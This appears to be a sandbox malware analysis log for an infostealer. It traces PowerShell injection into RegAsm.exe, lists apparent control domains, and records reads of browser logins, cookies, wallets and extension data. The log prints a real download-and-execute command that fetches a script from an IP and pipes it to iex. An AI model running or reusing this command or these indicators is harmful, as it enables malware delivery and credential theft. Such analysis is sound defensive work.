      Source: RegAsm.exeString found in binary or memory: moutheventushz.shop
      Source: RegAsm.exeString found in binary or memory: respectabosiz.shop
      Source: RegAsm.exeString found in binary or memory: bakedstusteeb.shop
      Source: RegAsm.exeString found in binary or memory: conceszustyb.shop
      Source: RegAsm.exeString found in binary or memory: nightybinybz.shop
      Source: RegAsm.exeString found in binary or memory: standartedby.shop
      Source: RegAsm.exeString found in binary or memory: mutterissuen.shop
      Source: RegAsm.exeString found in binary or memory: worddosofrm.shop
      Source: RegAsm.exeString found in binary or memory: knifedxejsu.cyou
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 441000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 632008Jump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"Jump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D7800910 cpuid 0_2_00007FF7D7800910
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F17A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7D77F17A0
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1064030638.000000000310F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
      Source: RegAsm.exe, 00000007.00000002.1062635600.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
      Source: RegAsm.exe, 00000007.00000002.1062635600.0000000000B99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
      Source: chrome.exe, 00000008.00000002.2131890551.000009B400664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: GCMKeyStore
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cert9.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\formhistory.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\logins.jsonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
